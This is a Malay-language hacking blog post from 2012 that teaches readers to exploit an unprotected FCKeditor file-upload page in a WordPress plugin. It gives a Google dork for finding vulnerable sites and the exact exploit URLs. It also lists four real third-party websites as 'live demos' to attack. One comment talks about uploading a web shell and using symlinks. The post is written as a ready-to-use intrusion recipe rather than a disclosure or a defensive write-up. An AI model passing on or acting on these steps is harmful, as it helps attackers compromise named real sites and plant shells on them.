Wednesday, 29 August 2012

New Wordpress FCKeditor File Upload Vulnerability


Assalamualaikum dan salam sejahtera.Maaf la sebab lama tak tulis entry tutorial.sibuk beraya!hoho xD
Baiklah entry kali ini aku nak share dengan korang exploit fckeditor untuk wordpress yang baru.sebelum ni pun dah ada kan?tapi yang ini yang lain pulak :)

1. Mula-mula search google dork :
inurl:"wp-content/plugins/fckeditor"


2. Cari salah satu laman web dalam result dan masukkan salah satu exploit dibawah :

Exploit :
  • http://target.com/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html
  • http://target.com/wp-content/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html

3. Link file akan diberi selepas upload.

Live demo :

http://rentanice.com/booking/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://sainttimothy.org/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://lifesaving.ca/blog/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://knike.fmf-radio.com/wp-content/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html

Itu saja untuk entry kali ini.Assalamualaikum.


Item Reviewed: New Wordpress FCKeditor File Upload Vulnerability Description: Rating: 5 Reviewed By Unknown

Share:

3 comments:

  1. ‎404 Error File Not Found

    The page you are looking for might have been removed,
    had its name changed, or is temporarily unavailable.

    ReplyDelete
  2. bukan semua web boleh masuk.tu maksud dia admin dah patch vuln sbb tu not found :)

    ReplyDelete
  3. lau bole upload shell...symlink kenyang.keke

    ReplyDelete

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com